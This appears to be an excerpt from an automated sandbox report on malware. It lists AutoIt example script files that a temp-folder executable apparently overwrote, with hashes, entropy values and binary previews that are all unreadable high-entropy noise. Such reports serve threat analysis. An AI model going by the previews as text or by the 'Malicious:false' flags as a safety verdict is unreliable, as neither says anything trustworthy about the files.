                                                                                                                                                                                                                                                Preview:B.......k....cSw.....X2p./?........J.\5...Ba..M..".....W...G.M....>l9b.G1P.....r.&.j;."......(RcD...n2.....*.....^.6.z......".U.;I..z..H"...../...X.oy.p.Qr..4.q.u{k..._p]..k.@...(......._....r..........>4..M.N.2'.... ...@.....1......o..`.,S.@.{B2=..<J.S....g..TL1c.$I......`....a.['1.5....F..dm....i..'...\.....D.....5L.L?p.u&......E!....o..=....D.{:.^.|4...1..@@..4X.p..U.....7.....p.T...'...y.e.e.D2.J.N......^D."....T.H..a.o,E...~...Y...6._Z...An....%.....q......m.'...Rem.n.~".d..L..0?{.#_..E0_.k .d'.Z....T4.o.`....q^Od...9Ir....ee.%S..|...;...6!#..Xv.uxt*b$..x.>;........"...z&wa.N[...H.....f}u.........bL-q$g..'.......W.,..(..g..W'+.Q.....W.*.G.b..i..0.S..N.(K..l.E...).V;.b...A/.. .8).....]t....30=..MTf.'....O..&....(._..l..A...b.....o.V.W2@.k.3...y.....Q.RA.BQE.....c..wZSjP..nV.h._.Z2....\...@:.!.YK.....])....=b....Q.mU.K....L....8...N...%U.]&>.s..f...O.`Y.eO75...<a.Z&..=qb.w.|.'|.q...3Qa...w.=....l.)O~.S.2..O.%#5..rSc.,..(0nl..yF........o..

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_GUICtrlButton_SetCheck.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2356
                                                                                                                                                                                                                                                Entropy (8bit):7.911273612981397
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:e7w0gsxifCjfHmHnwNSRG/rV2nQhKc4o0jZtwCC:j59fCjfGQgRFleN
                                                                                                                                                                                                                                                MD5:233FACD362F8CE9C5894CE07DC7A5F89
                                                                                                                                                                                                                                                SHA1:6192ED1AD67D6293D640C7F7810C3C49DB38C455
                                                                                                                                                                                                                                                SHA-256:ECC6B7C023988656244F0A7E022F33B3828232E6EA2F4BC583FB18E0909CCE36
                                                                                                                                                                                                                                                SHA-512:2B566DD8E008FE616418CAB92461A3718773651C5EA345DDD177289B21BA5F195E9C61CB11B62DD6857AB171803D094C90B193CD3D00AE851746EDA99A785BC8
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.o......./p......[..{.sF....].....>0..P.........}.>..j]..H.....m.4.Zl|zH..H.Rd{.....f..s.K.......B..1...7.....m.-.7.....)<.q....a7 Q.....o.(....P.Y.L.n(P]!N........L.a.K.....0.t<@.o.^.a..|q.nY...]Fch.....ZV.[..[......r.d.;&..G.rI....nd..F.. .#uHL....V\.yi.Ud.....'.G..:$s..n.va2.......o.5..c.v.2.e.. ...N...P...3..L.?o.K..2..`.......<D.G...I5.3f.(vt.1v.,.._.....Q...@Y.5A)?.......}%....~...a_.p.Q.............<~K.....o....{._cI.}z`.&q*K.5.fQp..[.1...I....G=.^Q...].|L1|.Y$.?.Of./U..%c.;Z......Nz....`.YV.Q....l#...l....8|.M...gE'......EI.0./.E..O.%..>...9.....t...l.J..31&.'.e.7L...3..")O.#.@..;m......WS.&m...^..e...s1n... .d.&._m. ..1)8]..l.U.G.n..%.....l...t.....%.B.<..yP...W]..2o.IQ%..=.w.l>..T..1.O.v.7<.......$.c..Y........a...C@.V%..3...R....s."........e....(.s~H.W.R.RW.^...7.vUo..D..j.(j.S!..F...Z..T.m..|...V3....|..5.Brr.#....IA....6.{W<&.......I.~k.=4..a.{XI#.oa.@....c...m.>_.l[Q.Q.ld.g....%....fD..r.G.?..6.[...]O.L..W.iA)..#uA..

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_GUICtrlButton_SetDontClick.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):3256
                                                                                                                                                                                                                                                Entropy (8bit):7.933129247692316
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:96:g4NBuQDLa85SCiSopQPGu8P+NdbeTV6F9IaTqDle/c:xNUyG5C+iPWPwdbepEb4UU
                                                                                                                                                                                                                                                MD5:5F947E118E8927FB447837CB2FB24F39
                                                                                                                                                                                                                                                SHA1:42CA4FC8BE9D0FBA66897F3C7BE62A690F461DE0
                                                                                                                                                                                                                                                SHA-256:0173A8FA5267D83963C5B3510D9AD38396BA838E7E6A7ADBB1582AE3E4BFE6A1
                                                                                                                                                                                                                                                SHA-512:255C0E3D5357872E8431FD4BF9FC925C565FF5A8F8EE6FFAA2C616F01F13B4590B4A11C530AA96DB3FEF7D16795363330572050DDD892E3EB64E668C30FFF623
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.Xr.:.st...Q.........YD....P.;....>.t.JcS.5.N5.t.u.t.U.C.ek.I.-..-.g.tw.,..[8/........kE..v.!....c.\...3......&S..[Q...<.$.~\5...<HP..'gW...Fso.....u.-R.D.....xP..73.Z.e.{.&....{.7..!;M.u..._.}..E.0.......y..DA..(E...j....Z.........:.{5PW4.d..22...Z...9...@L.....j3....&......\..q&|......8.?....~..vK....i[...!.F.QH.ZI....nEO...;..c..{....E.xNZ..N..h_..g...\.u4j...G|..E..H..RW..c...&.cOH..z.i...../0.A.D....&......$.....B..q....dV(...p.k..n_rDPhdNM.nl.*.T.(.G4..w...._..>s(..((.....|.4r.K....u..&.-w..v...?a.....!*...FPj.Q..P..>.L.i..o20<._FV:...w..........t.h....#.gm.....9....SSe.=*.q`4....\......4.........{...Y..<.^`..h.......R... ...G...e./........+....J.z..1.....$"...3.g.3....2.6.r.....x....u.*=.u+8uO.T..H...L"...s..oj.M........:....o:F...w....|.t....z.D.K..?Jb.A....PJkg}L....bq.Iz.X....:......dn=n.........`...y2.T.{..zp...1(F.{\.V...2...(...G.@.Q.<.....[L4:.#.k.+.B ..........-..y.B..C....}.+............3B...^....}.....,.V...,..."......p..

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_GUICtrlButton_SetFocus.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1831
                                                                                                                                                                                                                                                Entropy (8bit):7.8836480965764935
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:bsN+geBQ0ZV5Y+mNNlUZ4YyhYy4oo8ydzEwXZ4o0jZtw7T:oHeBQ0ZnY+mNLUZ4JhNbwqlen
                                                                                                                                                                                                                                                MD5:D6312A63C92BBB11D5B1E25414BD142E
                                                                                                                                                                                                                                                SHA1:FCB3D26AC1C757358B3DC91D803787A6AF367B32
                                                                                                                                                                                                                                                SHA-256:C276C62A00AECC46043ADF164E26D91AD4868957DBDFBB396CAA02FD4761A2DB
                                                                                                                                                                                                                                                SHA-512:0B90EDEE9D8F71D563E909647F4B188BB47C7426E1CDBB1D382558C6B889264DACF1BF424045D7F85E483B4564491CD27E0180EBA614C444E5C5FD6DF8103819
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:z.XR....BM1..\..p....9...Q%.\^.\<a*f..6......z....\I+.H>/mZ...2g7iH.u.[.&/>g.....I...!.*...|.v+h..@,.(....@O..K..Quao.6.d|..Q.].....q....D...j.\2.>..[....6.*a.Z..C.8.ns....*u.x.w^.6....=..-.."..i....p...T3.k..d...>g.@d.b....S.g...N..@.....W.......X...~m..CNkY4.<..n........8.{......Z1am.x..W.^..`9...D...L,..m..".g.]].w.3.@#Y,.....~`.F.J..:Y...U..<".....@e..zr}U....w.vQV.O...J...Y+...45m..?..0..,.....{....`....4>&T...6L09LO.4..%......b....N3..V../.%.a!s.........+.. .i..".q....*.5..W...e..|.o.....mM....G.....y..b.I;..-...9T....M...Ax,.]....l....cS/..&...!;2 .. .T..\?R....E.PD......x...=`l.d9.........x...5l..?...1..Y.4..i..\..U9?d..m....8>.^.5m."..-.|.w...db.....'.m.5..Wn.i..04A.X'v...'a..{..7.-..+..#..N.M8.vS..'f..$.>...!...I....T.*..'....n......Q-}..H.M...L.._...Z.7..'H.;$.k. .0..X..s.tg.)I...0..=&E..h...3..).i......eJT.[.......H.$.E.V5a.W..?'....5.3b.......s5.....e4...$...#..a.n..&.u....H..9....o..2.PR.u.....'.7d..4..|...M.ky..QX.l....

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_GUICtrlButton_SetImage.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2030
                                                                                                                                                                                                                                                Entropy (8bit):7.888634102056535
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:k81XN57i3c6rVKEtaDdvm22cVysKLYQ04o0jZtwV:bN5i3cmKEt2mSQs4YMleV
                                                                                                                                                                                                                                                MD5:B9CD491BDDB6FF7F04A729D3E9EA7CC2
                                                                                                                                                                                                                                                SHA1:EC6C1E406918E75885060BE69E02E84D0C50C8B8
                                                                                                                                                                                                                                                SHA-256:2225EA03F923ECB40412CE2B454C0DCC2B2F2DDB6E04947D06FA45F2E4B0394B
                                                                                                                                                                                                                                                SHA-512:EA7300DB9902B86A8EA0F1F25373139A98D336CDF6C1852D5A43EAAAF284FE0807BFAA2F990ADC201B4925081FA28DA8E7348B06CF133C33D182D2C454B31141
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..7s..O.:....b.1sm..i.@..R...."E.T(.....z.)0H.n.5...._..$........u.AA..g....wA......2.Q=..]..j.."0.c9..X.R.....hB-.&.n......cu..wh.o....j.9.O...ha....N....o.. ...$.{.x...1.;.@S..?.Y......y.J4...Z..e.d.j.e6....{.,..p.f.)-...w.u.t.H.-..El....|....E...J.[......|Zn....0......k..dH5Vv............M.Y.0q.=!.Q..9ale...$..F.........t...}\fJ...H..........g%_.EQ.#1..V.x[.C...."..2~+._./.z.Q..w...........alum.*2..;1..r..G..e.z.<Y..Bd...B..%...$....b..K..^2%^.#..6....Z.R..[.Z..s".Xk.?......y...O.x...N\...X....J<.W...>$..A.5e.>.2...h...pl3./H\.D.]..gk. ...-<...ax..8.....F....\.r0..Z....B9.6.-_.H.7[...N.._..06.d.@I7\C.Q...z..*c..>i4.....Hu....G...7.....9..Y].....?y....T......QJU.u.+VzmMZ>.w..dr8.:........Epx.w.;.;]h).o.:...1...N,...|:S......^.t..#S...lgc....a.U..NK.7...a[Y6...f.]dX..E....`................r..Y@..[...Jsg...f.=\p...a?.....N...=.........uO.D....1S....X.g.......r]..wW....ut.'...Lh.h.g.r%.....o..to.l".}4..l,.....P...L.{um... .oo..S..|...u.S+

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_GUICtrlButton_SetShield.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1252
                                                                                                                                                                                                                                                Entropy (8bit):7.81799031752649
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:yIbHPXka6H0M/Rf0Uur7ovGnwmtmfejmJrc0YXUZtwsTiQxc:Xb/Cd0UCo6waUQ4o0jZtw/ec
                                                                                                                                                                                                                                                MD5:A94F4F4DD6123E8DF4F2CDA026727A5C
                                                                                                                                                                                                                                                SHA1:BEAF32F77D69EE956D2D61E6E6D52064059E7330
                                                                                                                                                                                                                                                SHA-256:BBA3837F4E69C413A9D3B3122F21A232EA02FD4EBE7304FDE3E8A73071BBB1D5
                                                                                                                                                                                                                                                SHA-512:46A41424EEB17E61A6C621E0C42BBB2AF5816EC53CD946AA66FF748D56311787813F4064AD732E84864BF186772FD83ACB6D4E3E499CA574B8FE4F06644499B7
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:pL...J....j...,...3..>4...$..Xk6..,.....sd..>].....\n$.|......!.....$.^..t.7/b.A9....>f..d.&.O.M..,gW.c9.?..}.-_\.>...@G....m_.....t..G.*.@JI...C9.-.h._.>*..n?..i/..q..e.............MP.uz.....j...j.....v.&8.r..k...t......M....-.B. ....hf5.-`.R...S.rD..P.vt..~W.....T.?.fj....>U..}.[C......gIy...M.d;S.X!...'.0S..yi..G...Hhp..%{X@l...\......{$p....E... ....93j.j..r.!s!d..7x...P.7t...8....u......\.d.-f.V..o(<.c..a.t...&.=.3.......O....X...t..c. ...a..|.f.T.i.y.I.a.K.E......:...N/(..M\|)?..\kN...q.n7............g..Z....N........o.[..?.W..mn.3.jI.Q..]v..i......a.P.~....vNl}..?..}..7.e...388T..].5..J.^k. ."-..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_GUICtrlButton_SetSplitInfo.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):4903
                                                                                                                                                                                                                                                Entropy (8bit):7.96093039484461
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:96:kJcGqM/9mbyAlGutdRvIWkVDFC1YoLq4OMZBX0HtulejZ:EbqOIbzt4WtYo/FpFUjZ
                                                                                                                                                                                                                                                MD5:5D890A3BAFC9D6443D801764B108A995
                                                                                                                                                                                                                                                SHA1:E32EED809CBC3E1AE42EB181C45587BB723C2A31
                                                                                                                                                                                                                                                SHA-256:266E64B5E88373ADF127134F0BE19AA9E01FECA4FB725D3F76DCD2873E9DF5DA
                                                                                                                                                                                                                                                SHA-512:2E222716162CAA9ED3C02B42BD10B01929A9FBEFDBD16A41A4A7B6DC7D02A8AD8D98303BCEC8B2730106616CFF69EE434832C7B5E38AB751EDF42771BF14ACBD
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:JQ.h...g_.......;O.8......8.i.[S.5..t>..-.0.........{.....2.Nb...0.U.e......nz..Z...R...f....F.m.......mE.....q..ub@.>.XP.)...\..5..r.O.l.O.f/....Y.nW..'..pVh+...T.(.Y.....4.....j..6e.kf# 1..i....Z..\.y.......2Wo.R1.UoU.'+..l....Y.9f....=C'..7...e.V2.P...Q...,.])....9..v..v..n,..8>.u..?...I.+.`..Fj)....'.9..`......k.D..EN.zz..;..`d.h.D...3+,....._.y/..n2..n.@W]..<A......M..t{....-..1f.{.v.m.'Q.b:.. .K]...(.6.2....xd1-...S...!".....d..cS6...>.,;i~..B..d..(....e.....}]CQ.@..~.)s.M.%..G.i..........I.1.UM4...u..t.B...!?9!.1.vi.......V.0..#...P..c.3>3Y....fz...j..=.q.y.M.z...Q4..'PA@...p.g....$.R~.B.3....L.-.l.L.....TP~.n.G.....s.RW.n.H#..2l....LV.......#.G.r.xe.1l..l..7.a... ..8..+...U.j.O......E....Rd....+....."lQb.bQ...8.c...!./.....+[1..N..]...Y.z.1b}..6&.CS.0......Na....b} 4]Je.....o....).us.V..n..).E.n.?..f.i6zX.:..*..lS...88.l..w.[*....[.wB...\.=..U.k............6.[...w..?../.n|...G...;.\....ng...u?0.5..%e!.i:H3..Z.J.A.6..d...9.2..=....

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_GUICtrlButton_SetState.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):3908
                                                                                                                                                                                                                                                Entropy (8bit):7.95027903136311
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:96:tw8lmISgKHjRX+tkLI7o7Py1/sNsbleAQ:tw8lmyKDF+iLWJIsbUT
                                                                                                                                                                                                                                                MD5:F1FB52B138576A88DF9762B833EF7999
                                                                                                                                                                                                                                                SHA1:00ED18304DAEC56C23AF53EB9006D97BE89C6D82
                                                                                                                                                                                                                                                SHA-256:E7003AEA202F58175E7321971A19D3385638E07910289782A6D1DBC562093187
                                                                                                                                                                                                                                                SHA-512:4F095307694CE4F4B0F368A513484F692BCC9BCF8766B32AB790D6914F82C06C034FB2B2D7D78A1622428340D7FFAA6769211BF2C8F1B4BE031E69578923EFB6
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:gm.s|..t..~..C..5.<.....F.U....j....~...r.v...N.'.)...~6..0+F.V.8.n.z(uM..0.......6^.C...h.....b..A.L.U...v.x.~.j.x....z....od..).|...wKax...[m..d..u:j./.).nj.....C.%x_.KA....CTp.R.........+.E..5.(..:..a...s...+#...)...k..q...4........yNW;......J"....pWJ..sm..-...Q\..=.V...*..C..D.e...=.......W.&&N....R..bO.c...qN0.>,.3b.Iv.p.8.5^{0.K.H}...W..e.X.:.p.,^...I-..1E.-i..ojj;.n.hU(......<...TI..~.M...4&O...z...u G7[G..=.d.]..@.<.......A.......>/.}.....xf...B...Z.%.8...l.H.....4>...o=f....^..p...........w.J.G...I...B.sz.....!..^...."...C>.....+.....O(t.$...G.....cm."Y...R..q..h....#.8.QIp.5)qc..?..C@C...B...Y[...ZX....(Z.f<....I/..e#.......!.j.".."...^.jm.5&?.3/.`...h.H...4^.]Zxp..B..u;.J4.../.OX.6|h].C..6..OM?...p.j...p....k..._....Z.g|.S.?..3e...2. y....I.Nd.E.....e.RHr,..;.C...u4.M..*T....n..~....*....EFS>:X^..C.l..ar.%.K...Fn4.K...^9.s@.z../...XR..{v,fAx6x.eP....1.N....b $;Q .R.....P.ff..P.F(...8(S....<. ..?Z..pzK.........Qv....y....U!eE..

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_GUICtrlButton_SetStyle.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1266
                                                                                                                                                                                                                                                Entropy (8bit):7.833631105396247
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:c2pULBdzxSQV/pW6LhEbcAG52jmJrc0YXUZtwsTYeVM:c2gxt/pW6LhM4o0jZtw8M
                                                                                                                                                                                                                                                MD5:8E90F3E40DBC6B00C18199E5EFDB84C0
                                                                                                                                                                                                                                                SHA1:D24FB21899FD6D4EEE8DFE967DEBEC596FDF24B5
                                                                                                                                                                                                                                                SHA-256:B0DBEE4AC96FCA143FF6A367726E6969CA7AA79C691736CDBF02EEACFBE3AF97
                                                                                                                                                                                                                                                SHA-512:9B0ED951212B2D8835601799D6AFE1C7D694A6814539342656E09709EE14275D45D47AAE621A470E527DE44D30E01DAD0B7F1856C5DD49DBB93F79F84E3E38C9
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:J.]........P<.......8AoV...,..x....O...i...L.pYUo.q.O...F.4Q..V.T.+....Cc..l...FT.G..,.j......Er..^.{../.@....PD.......er8.]kG....A...4.p.)../X..Y]%j.t...nM....%.n4C..).*..a......RL....Dz.Z..e?.@.S...V.......Q.iO.*...`H.D....-..\.-. ......^...c.hr.....TO..X..z...po..#.I4..f.<p`]..U"b.&..;...x.=.W.......u...y#...zb~......z<..H......\.v#^.W....3....,}..r.C?..XlH......^:.-.|...r..d.n.B.....B.9...EX....A.....@....y..(xN...G.Wwr....9....h[.7Vu.........Hy....[...t.KI)..M(<%.....d/$....%...`%.=.<|...K.....Rl6..gUUt.kA\..^_.^.4....2.G.X}.a....>.........%.|..rG..a0v.R.......HN.....8...8b>....u...].Fp.'.7k.z7...S.$>.^...>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_GUICtrlButton_SetTextMargin.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1778
                                                                                                                                                                                                                                                Entropy (8bit):7.884181383406155
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:5Yp7fsF+Tqxa/Oo1Yk3DkFxlRKzhI4o0jZtwoU:5s8+mk0Kz3leoU
                                                                                                                                                                                                                                                MD5:D3C55C4B956EE59C20A5DB2BECA2C481
                                                                                                                                                                                                                                                SHA1:B2428BF037BEE02F1A4D09DD9CD0AF903BF0B32B
                                                                                                                                                                                                                                                SHA-256:F08ABF76E5CB2A0FAD3753C19B0A4C4334B185BC51D80FA9DE7C57ABC60CD703
                                                                                                                                                                                                                                                SHA-512:2B1777F03D5FD88854E60EBBCD8986DE44BBE41CBBB5CEFE54C53B5D16C4DD0ABE9FA5D3934D407FE30D03CFF1E28917FF4A122A7135FBDC20FAFE3C61E392EA
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.2....-..\...S.....y U.D.....I......nX].L......W..q...c.L.`B..%E.8^q..........$..X|....t.......$&{.................S....A..}r.....%.L.;.z."..a.a..... .q>.n.z...........F..k...yN].m......r(......J.M.L.oI7......Z.U3..s..#OY..@.u!....Z..,p..n.._..&|#.Ei1......y.RM....V....*...-...^5.M.=....P.O..`ar..m!...X.......p..S..'.......G.......R.E\.....rA.J.`..M...g.7...p.......~...=.E..,..J..0v..."9>&.I.#.qj....)..n...u.RMq..5].."..]..P`c.[.(..U.GT........j..0...j%..Ib5.h.5.(a......g.h..P...l|.w.9.....u.......s ...,.Fj.....>...N6.......5.I..r.t6.S.?.O..n..`.DS...m.l.......Y.F...<C...E.'p..9,a.].w.'.{.lQY.+-.3.A....:...p.72....O.>..&xj$....ac.zf....,^0....1|.I..l.e....-}.. .......!..s.._9.fbd|..b....V...'.p..I~.ie\...e9&.?`.F.U.4....p.k*.EV;F..%....m.`.......Ldd.b.b......\.>...J.^'..S..YA..'......O..o.1..Ah.M.....f;...o.....t9.Rl.!..W..,....X..r.$....CP]E...w..4....1{=D7L0,g.@P...N.....\..0~.E.Xv...0)...vB,J....Z]....G.... .nq.@<..M....S9p..b..R<.kt.

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\pragma.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1789
                                                                                                                                                                                                                                                Entropy (8bit):7.879803450245918
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:0bGQfqRwKaOasZOzB7b4av+iuRzNFKqX457u0ZmRyZux7zX5jmJrc0YXUZtwsTF+:KHuraOqF4avORmo0q0ZmdB4o0jZtw8+
                                                                                                                                                                                                                                                MD5:D6F3D74CA381CE31AB9D35BAF2D2827B
                                                                                                                                                                                                                                                SHA1:D1BB4E191B4D81A92201F6AA4603E9E9DCA9586D
                                                                                                                                                                                                                                                SHA-256:4FCB0A9896F0EA0391743551CF0642F5B27E8B768A658154B0F59C5A4DB06337
                                                                                                                                                                                                                                                SHA-512:69B3CA73C1DA1F7335DEA5FF923F8555A85F1DBD90F00A504EA9A5971CF96EC3AF5F4AB460879C007806439C947A5F1AC8D43081E95CF1AA7E077823DF0A3267
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..#..,v.e.Z...z.qU....>.E.da.w.......L..[e.OK.......z.a......-...(.A.p.;#.TT..(<..Ix.q.....;i..;...j6.w+..5..*....7.u.V|lG.'@..5]^T.....Ap.._..O..I......Y..MX:......W..g..<..1(......\.&.>.I.zD....7...H....~..T=FD....D.....6......;Q.A.?9`...IQX..Me.....%.J-.[...1.&D.b.x....=........A.$.1.\/..T..nX........~<....z.. .6O.A3......0ah.....p...o..k...m<.E{9.],p.Q..A.[...A.f..X.z<..c),..a+.^.... ..x..c.'.!..X.^.0..A..p.<u..#...n.......$.....1...J..r.....-...D}37...V....s..Y[{ST....m.A....Kf.......b&.U.=... fp.L...{j.]Y.Q.j..]>%l.X.>..pj.Gu.'..?....09....Q...#.y=..x{zK....H.c.~....h..H.e.w..A.}.V....Kw5....D....L...#..>p..yU....o.\....w..<..i\...VQ.A.....K../....bS..........HW....4.ar.1.0...D.H.7..U.5".}.U<..I........VC...>.0....A.2.i%...=............._]..J....9.Z..M.P.*x..T...dru..."..\.Qw\1%.k7.o._..'.Nns.<...hAm....I..+.....^.Q~<..\."......?x....MnTj.o.p.M..8...;...J..B.,...%..=d.[w...v....n.77......._..e.Be.#`.^?OQ......C.D....."`...Q.O5

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\pragma[2].au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):796
                                                                                                                                                                                                                                                Entropy (8bit):7.696655618380409
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:MFrDQvXyg4LMjaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsO1xXZ+3I6n/c:AQ/F4YjmJrc0YXUZtwsTi3I6/c
                                                                                                                                                                                                                                                MD5:08FA606139122268BD7AB24F6D66BDB7
                                                                                                                                                                                                                                                SHA1:E18E76E40747D5DE0C69077ED1A33DAC178FAFBB
                                                                                                                                                                                                                                                SHA-256:5097905FD1E2F3239C7D8A47FC4DC11A0D54ECC8ADCFB855A9E16987E8597B9A
                                                                                                                                                                                                                                                SHA-512:54D32E4F477CDD8F3C4AE1B67B153D3A20EFA71B9A089652F26CB6E381912987DF2B88FA40B3761885CC27D9530F5904356B720197E3F4BCD964D6990545B562
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..sr..H....J.......>.0..9cL.e.g.Q.....fD=.XXGO...i....Z.2n..K...W....S.o~....O...54...wq./c......Gy...J.u.a.a..M.g."..k<`.5.Tz.M......R... .Vb..\.b..kBM~cW.V...L.c.ZqJ...N...=.e.mF.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$...sQfd._N...fn..x.Eec...c.k.3.D......................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\pragma[3].au3

                                                                                                                                                                                                                                                Download File
